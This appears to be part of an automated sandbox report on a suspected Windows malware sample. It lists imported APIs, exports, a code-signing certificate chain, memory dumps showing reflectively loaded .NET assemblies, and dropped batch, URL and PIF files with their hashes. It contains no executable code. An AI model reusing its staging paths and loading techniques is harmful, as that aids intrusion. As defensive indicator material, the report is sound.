SetPixelV	-	0x0042D454	0x0002D3C4	0x000267C4	0x00000000
SetROP2	-	0x0042D458	0x0002D3C8	0x000267C8	0x00000000
SetStretchBltMode	-	0x0042D45C	0x0002D3CC	0x000267CC	0x00000000
SetTextAlign	-	0x0042D460	0x0002D3D0	0x000267D0	0x00000000
SetTextColor	-	0x0042D464	0x0002D3D4	0x000267D4	0x00000000
StretchBlt	-	0x0042D468	0x0002D3D8	0x000267D8	0x00000000

SHELL32.dll (3)

API Name	Ordinal	IAT Address	Thunk RVA	Thunk Offset	Hint
SHBrowseForFolderA	-	0x0042D480	0x0002D470	0x00026870	0x00000000
SHGetMalloc	-	0x0042D484	0x0002D474	0x00026874	0x00000000
SHGetPathFromIDListA	-	0x0042D488	0x0002D478	0x00026878	0x00000000

USER32.dll (92)

API Name	Ordinal	IAT Address	Thunk RVA	Thunk Offset	Hint
BeginPaint	-	0x0042D604	0x0002D490	0x00026890	0x00000000
CallWindowProcA	-	0x0042D608	0x0002D494	0x00026894	0x00000000
CharUpperA	-	0x0042D60C	0x0002D498	0x00026898	0x00000000
ClientToScreen	-	0x0042D610	0x0002D49C	0x0002689C	0x00000000
CloseClipboard	-	0x0042D614	0x0002D4A0	0x000268A0	0x00000000
CreateDialogIndirectParamA	-	0x0042D618	0x0002D4A4	0x000268A4	0x00000000
CreateDialogParamA	-	0x0042D61C	0x0002D4A8	0x000268A8	0x00000000
CreateWindowExA	-	0x0042D620	0x0002D4AC	0x000268AC	0x00000000
DefWindowProcA	-	0x0042D624	0x0002D4B0	0x000268B0	0x00000000
DestroyCursor	-	0x0042D628	0x0002D4B4	0x000268B4	0x00000000
DestroyWindow	-	0x0042D62C	0x0002D4B8	0x000268B8	0x00000000
DialogBoxParamA	-	0x0042D630	0x0002D4BC	0x000268BC	0x00000000
DrawFocusRect	-	0x0042D634	0x0002D4C0	0x000268C0	0x00000000
DrawTextA	-	0x0042D638	0x0002D4C4	0x000268C4	0x00000000
EmptyClipboard	-	0x0042D63C	0x0002D4C8	0x000268C8	0x00000000
EnableWindow	-	0x0042D640	0x0002D4CC	0x000268CC	0x00000000
EndDialog	-	0x0042D644	0x0002D4D0	0x000268D0	0x00000000
EndPaint	-	0x0042D648	0x0002D4D4	0x000268D4	0x00000000
EnumChildWindows	-	0x0042D64C	0x0002D4D8	0x000268D8	0x00000000
EnumThreadWindows	-	0x0042D650	0x0002D4DC	0x000268DC	0x00000000
FillRect	-	0x0042D654	0x0002D4E0	0x000268E0	0x00000000
GetActiveWindow	-	0x0042D658	0x0002D4E4	0x000268E4	0x00000000
GetAsyncKeyState	-	0x0042D65C	0x0002D4E8	0x000268E8	0x00000000
GetClassLongA	-	0x0042D660	0x0002D4EC	0x000268EC	0x00000000
GetClassNameA	-	0x0042D664	0x0002D4F0	0x000268F0	0x00000000
GetClientRect	-	0x0042D668	0x0002D4F4	0x000268F4	0x00000000
GetCursorPos	-	0x0042D66C	0x0002D4F8	0x000268F8	0x00000000
GetDC	-	0x0042D670	0x0002D4FC	0x000268FC	0x00000000
GetDesktopWindow	-	0x0042D674	0x0002D500	0x00026900	0x00000000
GetDlgCtrlID	-	0x0042D678	0x0002D504	0x00026904	0x00000000
GetDlgItem	-	0x0042D67C	0x0002D508	0x00026908	0x00000000
GetDlgItemTextA	-	0x0042D680	0x0002D50C	0x0002690C	0x00000000
GetDoubleClickTime	-	0x0042D684	0x0002D510	0x00026910	0x00000000
GetFocus	-	0x0042D688	0x0002D514	0x00026914	0x00000000
GetKeyboardState	-	0x0042D68C	0x0002D518	0x00026918	0x00000000
GetParent	-	0x0042D690	0x0002D51C	0x0002691C	0x00000000
GetScrollPos	-	0x0042D694	0x0002D520	0x00026920	0x00000000
GetSysColor	-	0x0042D698	0x0002D524	0x00026924	0x00000000
GetSystemMetrics	-	0x0042D69C	0x0002D528	0x00026928	0x00000000
GetUpdateRect	-	0x0042D6A0	0x0002D52C	0x0002692C	0x00000000
GetWindow	-	0x0042D6A4	0x0002D530	0x00026930	0x00000000
GetWindowLongA	-	0x0042D6A8	0x0002D534	0x00026934	0x00000000
GetWindowPlacement	-	0x0042D6AC	0x0002D538	0x00026938	0x00000000
GetWindowRect	-	0x0042D6B0	0x0002D53C	0x0002693C	0x00000000
GetWindowTextA	-	0x0042D6B4	0x0002D540	0x00026940	0x00000000
GetWindowTextLengthA	-	0x0042D6B8	0x0002D544	0x00026944	0x00000000
GrayStringA	-	0x0042D6BC	0x0002D548	0x00026948	0x00000000
InflateRect	-	0x0042D6C0	0x0002D54C	0x0002694C	0x00000000
InvalidateRect	-	0x0042D6C4	0x0002D550	0x00026950	0x00000000
InvertRect	-	0x0042D6C8	0x0002D554	0x00026954	0x00000000
IsCharAlphaNumericA	-	0x0042D6CC	0x0002D558	0x00026958	0x00000000
IsWindow	-	0x0042D6D0	0x0002D55C	0x0002695C	0x00000000
IsWindowEnabled	-	0x0042D6D4	0x0002D560	0x00026960	0x00000000
KillTimer	-	0x0042D6D8	0x0002D564	0x00026964	0x00000000
LoadBitmapA	-	0x0042D6DC	0x0002D568	0x00026968	0x00000000
LoadCursorA	-	0x0042D6E0	0x0002D56C	0x0002696C	0x00000000
LoadStringA	-	0x0042D6E4	0x0002D570	0x00026970	0x00000000
MapWindowPoints	-	0x0042D6E8	0x0002D574	0x00026974	0x00000000
MessageBeep	-	0x0042D6EC	0x0002D578	0x00026978	0x00000000
MessageBoxA	-	0x0042D6F0	0x0002D57C	0x0002697C	0x00000000
MoveWindow	-	0x0042D6F4	0x0002D580	0x00026980	0x00000000
OpenClipboard	-	0x0042D6F8	0x0002D584	0x00026984	0x00000000
PostMessageA	-	0x0042D6FC	0x0002D588	0x00026988	0x00000000
PtInRect	-	0x0042D700	0x0002D58C	0x0002698C	0x00000000
RegisterClassA	-	0x0042D704	0x0002D590	0x00026990	0x00000000
RegisterWindowMessageA	-	0x0042D708	0x0002D594	0x00026994	0x00000000
ReleaseCapture	-	0x0042D70C	0x0002D598	0x00026998	0x00000000
ReleaseDC	-	0x0042D710	0x0002D59C	0x0002699C	0x00000000
ScreenToClient	-	0x0042D714	0x0002D5A0	0x000269A0	0x00000000
ScrollDC	-	0x0042D718	0x0002D5A4	0x000269A4	0x00000000
SendDlgItemMessageA	-	0x0042D71C	0x0002D5A8	0x000269A8	0x00000000
SendMessageA	-	0x0042D720	0x0002D5AC	0x000269AC	0x00000000
SetCapture	-	0x0042D724	0x0002D5B0	0x000269B0	0x00000000
SetClassLongA	-	0x0042D728	0x0002D5B4	0x000269B4	0x00000000
SetClipboardData	-	0x0042D72C	0x0002D5B8	0x000269B8	0x00000000
SetCursor	-	0x0042D730	0x0002D5BC	0x000269BC	0x00000000
SetDlgItemTextA	-	0x0042D734	0x0002D5C0	0x000269C0	0x00000000
SetFocus	-	0x0042D738	0x0002D5C4	0x000269C4	0x00000000
SetForegroundWindow	-	0x0042D73C	0x0002D5C8	0x000269C8	0x00000000
SetScrollInfo	-	0x0042D740	0x0002D5CC	0x000269CC	0x00000000
SetScrollPos	-	0x0042D744	0x0002D5D0	0x000269D0	0x00000000
SetScrollRange	-	0x0042D748	0x0002D5D4	0x000269D4	0x00000000
SetTimer	-	0x0042D74C	0x0002D5D8	0x000269D8	0x00000000
SetWindowLongA	-	0x0042D750	0x0002D5DC	0x000269DC	0x00000000
SetWindowPos	-	0x0042D754	0x0002D5E0	0x000269E0	0x00000000
SetWindowTextA	-	0x0042D758	0x0002D5E4	0x000269E4	0x00000000
ShowWindow	-	0x0042D75C	0x0002D5E8	0x000269E8	0x00000000
UnregisterClassA	-	0x0042D760	0x0002D5EC	0x000269EC	0x00000000
UpdateWindow	-	0x0042D764	0x0002D5F0	0x000269F0	0x00000000
WinHelpA	-	0x0042D768	0x0002D5F4	0x000269F4	0x00000000
WindowFromPoint	-	0x0042D76C	0x0002D5F8	0x000269F8	0x00000000
wsprintfA	-	0x0042D770	0x0002D5FC	0x000269FC	0x00000000

Exports (6)

API Name	EAT Address	Ordinal
@__lockDebuggerData$qv	0x00015E34	0x00000001
@__unlockDebuggerData$qv	0x00015E5C	0x00000002
__DebuggerHookData	0x00024A48	0x00000003
__GetExceptDLLinfo	0x00001046	0x00000004
___CPPdebugHook	0x00022117	0x00000005
task_proc	0x00001D8D	0x00000006

Digital Signature Information

Verification Status

Valid

Certificate: David Harris

Issued by	David Harris
Parent Certificate	COMODO Code Signing CA 2
Country Name	NZ
Valid From	2011-10-06 02:00 (UTC+2)
Valid Until	2016-10-06 01:59 (UTC+2)
Algorithm	sha1_rsa
Serial Number	BC D9 48 45 DB DC 47 BC FB 82 F9 D3 CD 06 18 61
Thumbprint	4E 84 B7 75 99 E2 93 D9 08 D6 C0 CE DC F0 16 FF 22 AB 40 5C

Certificate: COMODO Code Signing CA 2

Issued by	COMODO Code Signing CA 2
Parent Certificate	UTN-USERFirst-Object
Country Name	GB
Valid From	2011-08-24 02:00 (UTC+2)
Valid Until	2020-05-30 12:48 (UTC+2)
Algorithm	sha1_rsa
Serial Number	10 70 9D 4F F5 54 08 D7 30 60 01 D8 EA 91 75 BB
Thumbprint	B6 47 71 39 25 38 D1 EB 7A 92 81 99 87 91 C1 4A FD 0C 50 35

Certificate: UTN-USERFirst-Object

Issued by	UTN-USERFirst-Object
Country Name	US
Valid From	2005-06-07 10:09 (UTC+2)
Valid Until	2020-05-30 12:48 (UTC+2)
Algorithm	sha1_rsa
Serial Number	42 1A F2 94 09 84 19 1F 52 0A 4B C6 24 26 A7 4B
Thumbprint	8A D5 C9 98 7E 6F 19 0B D6 F5 41 6E 2D E4 4C CD 64 1D 8C DA

Memory Dumps (23)

Name	Process ID	Start VA	End VA	Dump Reason	Bitness	Entry Point	Actions
buffer	6	0x2BF30000	0x2BF88FFF	Reflectively Loaded .NET Assembly	32-bit	-	... Actions Go to Process Go to YARA Match Download Dump
buffer	6	0x2BFC0000	0x2C017FFF	Reflectively Loaded .NET Assembly	32-bit	-	... Actions Go to Process Go to YARA Match Download Dump
buffer	6	0x2E3BE000	0x2E3BFFFF	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	6	0x00197000	0x0019FFFF	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	6	0x2A470FD0	0x2A47104F	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	6	0x2A472010	0x2A47280F	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	6	0x2BDF0048	0x2BE09991	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	6	0x2BE099A0	0x2BE499C1	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	6	0x2BE499D0	0x2BEA27DD	First Network Behavior	32-bit	-	... Actions Go to Process Go to YARA Match Download Dump
buffer	11	0x26D30000	0x26D88FFF	Reflectively Loaded .NET Assembly	32-bit	-	... Actions Go to Process Go to YARA Match Download Dump
buffer	11	0x26D90000	0x26DE7FFF	Reflectively Loaded .NET Assembly	32-bit	-	... Actions Go to Process Go to YARA Match Download Dump
buffer	11	0x2902E000	0x2902FFFF	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	11	0x00197000	0x0019FFFF	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	11	0x25240FD0	0x2524104F	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	11	0x25242010	0x2524280F	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	11	0x26AF0048	0x26B09991	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	11	0x26B099A0	0x26B499C1	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	11	0x26B499D0	0x26BA27DD	First Network Behavior	32-bit	-	... Actions Go to Process Go to YARA Match Download Dump
buffer	11	0x25240FD0	0x2524104F	Final Dump	32-bit	-	... Actions Go to Process Download Dump
buffer	11	0x25242010	0x2524280F	Final Dump	32-bit	-	... Actions Go to Process Download Dump
buffer	11	0x26AF0048	0x26B09991	Final Dump	32-bit	-	... Actions Go to Process Download Dump
buffer	11	0x26B099A0	0x26B499C1	Final Dump	32-bit	-	... Actions Go to Process Download Dump
buffer	11	0x26B499D0	0x26BA27DD	Final Dump	32-bit	-	... Actions Go to Process Go to YARA Match Download Dump

C:\Users\Public\Libraries\Aiymwhpj

Dropped File

Stream

Also Known As	\??\C:\Users\Public\Libraries\Aiymwhpj (Dropped File, Accessed File)
MIME Type	application/octet-stream
File Size	573.71 KB
MD5	cbcc38c75effd12edfbfe3a42776952d
SHA1	15888d1a926be2e5169ccf5b2c6c44149ea478a7
SHA256	43b4edaed35a38b6304187c67be1beda3f18769cdb06902bcffb7be597ac72a5
SSDeep	12288:+cZzMs7baCyZxlymn17OtgtNXR1Fye2D69AEhIKb4u/k:+cpBbR+lyG17mgtNPae9XIA/k
ImpHash	-

\??\C:\Users\Public\Libraries\NEO.cmd

Dropped File

Text

Also Known As	C:\Users\Public\Libraries\NEO.cmd (Accessed File)
MIME Type	text/x-msdos-batch
File Size	45.45 KB
MD5	637a66953f03b084808934ed7df7192f
SHA1	d3ae40dff4894972a141a631900bd3bb8c441696
SHA256	41e1f89a5f96f94c2c021fbc08ea1a10ea30daea62492f46a7f763385f95ec20
SSDeep	768:Ud6T6yIssKMyD/LgZ0+9Z2noufIBUEADZQp2H8ZLq:UdQFIssKMyjL4X2T8UbZT
ImpHash	-

\??\C:\Users\Public\AiymwhpjF.cmd

Dropped File

Text

Also Known As	C:\Users\Public\AiymwhpjF.cmd (Accessed File)
MIME Type	text/x-msdos-batch
File Size	15.41 KB
MD5	cce3c4aee8c122dd8c44e64bd7884d83
SHA1	c555c812a9145e2cbc66c7c64ba754b0c7528d6d
SHA256	4a12abb62dd0e5e1391fd51b7448ef4b9da3b3dc83ff02fb111e15d6a093b5e8
SSDeep	384:wleG1594aKczJRP1dADCDswtJPZ9KZVst1U:LA4aLz08JaJ
ImpHash	-

\??\C:\Users\Public\Libraries\FX.cmd

Dropped File

Text

Also Known As	C:\Users\Public\Libraries\FX.cmd (Accessed File)
MIME Type	text/x-msdos-batch
File Size	8.35 KB
MD5	60cd0be570decd49e4798554639a05ae
SHA1	bd7bed69d9ab9a20b5263d74921c453f38477bcb
SHA256	ca6a6c849496453990beceef8c192d90908c0c615fa0a1d01bcd464bad6966a5
SSDeep	192:dSSQx41VVrTlS2owuuWTtkY16Wdhdsu0mYKDCIfYaYuX1fcDuy:Vrhgwuua5vdnQaCIVJF6uy
ImpHash	-

C:\Users\Public\Aiymwhpj.url

Dropped File

Text

MIME Type	text/plain
File Size	104 Bytes
MD5	c57fafe6a81ccd3060ac5ffb943bc583
SHA1	916d26a9bc0fc5d1181ad146a87077d0666325ce
SHA256	20a92244e7624c8380a4663494cbb0db7280986c09958674f2135df5e18c07ff
SSDeep	3:HRAbABGQYmTWAX+rSF55i0XM667ysbxMdytKxovn:HRYFVmTWDyzv6OExcytKuv
ImpHash	-

c0c52c53512790bfad89e6570e325562af6e54251a301c556a9653b32b9bd79f

Downloaded File

Text

MIME Type	text/plain
File Size	764.95 KB
MD5	5f106e2c91d2518427e51e3b759d8a38
SHA1	01f292c9af803f1e97dc8a1fa1474818858ed8e0
SHA256	c0c52c53512790bfad89e6570e325562af6e54251a301c556a9653b32b9bd79f
SSDeep	12288:/UUc0mDwy7uDyYWP8+C0c3R2JfqAHXXHUd2d6hqqxWsIwLDlshIPJBRaK6Bs:/UUjWwUc+Cn3QfqAHBuHINWxBRH6Bs
ImpHash	-

85c53cb772b76435451823e899ddc37403c259d0faf6d96858f12ae7fb204d0f

Downloaded File

Text

MIME Type	text/plain
File Size	349 Bytes
MD5	ecfe26e3f9764a3885db553e726f2e2f
SHA1	8da9f66cf984d72984263ad982f1eefd6f620848
SHA256	85c53cb772b76435451823e899ddc37403c259d0faf6d96858f12ae7fb204d0f
SSDeep	6:LvgHZhJ+X2WrIq+zgJ36M7Ip3wtI5h626/90UV08HcJ/Qp1QTZpcROB2QmZTnP01:bg5X+XdkqQgJ34pg65h16q88J/QpsZp7
ImpHash	-

1c0231576dabacad178703654256c72994275d118767fd50b647875d8256205b

Downloaded File

HTML

MIME Type	text/html
File Size	102 Bytes
MD5	51b46b047c31037b5e169197dd4a3464
SHA1	2c1f5cdeac7dd93d0be7b59719147ee4bfb9c777
SHA256	1c0231576dabacad178703654256c72994275d118767fd50b647875d8256205b
SSDeep	3:qVZxgROCQ+y8RRCXbZ6SXOy0WtXhXXZKW:qzxU4+b3CX96kOPoRHZv
ImpHash	-

b6b5da015ed9b1222c507c4df03d0351addf6621168f1dc3d3351afda7ab1d84

Downloaded File

Unknown

MIME Type	application/json
File Size	55 Bytes
MD5	6a4152d7c4e4fdfcf1b2b058fb88a05c
SHA1	b6b65c7475d90d400af7dfb8db646850966eb35b
SHA256	b6b5da015ed9b1222c507c4df03d0351addf6621168f1dc3d3351afda7ab1d84
SSDeep	3:YKOHcWnyKBAHfrRGXUNGRFjJ4:YKOHnyaifRURZJ4
ImpHash	-

c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\counters.dat

Modified File

Stream

MIME Type	application/octet-stream
File Size	128 Bytes
MD5	0c867aa43e5361f08a042bf95af1ee82
SHA1	152cb9fb7cf8f9e972036e17b5d6bef471a21903
SHA256	576a886c58290258cb3dbc3ee2bca0dfc7d8c0c0c7a8d388204819eed36c5253
SSDeep	3:Bl1Vl:
ImpHash	-

e7a754ee38c15852a3e71f29f90d120ec36f8e33d0e5db3386ec26a29178350a

Extracted File

Image

Parent File	C:\Users\Public\Libraries\Aiymwhpj.PIF
MIME Type	image/gif
File Size	89.37 KB
MD5	2c82804b115ad8a1a6364ce596eaa5ba
SHA1	3bebf6035ffdea63f434d08c994d8c4fad6963ed
SHA256	e7a754ee38c15852a3e71f29f90d120ec36f8e33d0e5db3386ec26a29178350a
SSDeep	1536:wyJj+UA5tICETuwgn65ddWD6NJRS/282mtQ:wyl+nIRTp556GX0X2X
ImpHash	-

Remarks (2/2)

Remarks

There are no files for this filter

There are no files in this analysis

Classifications

Threat Names

Before

After

WHOIS Domain Information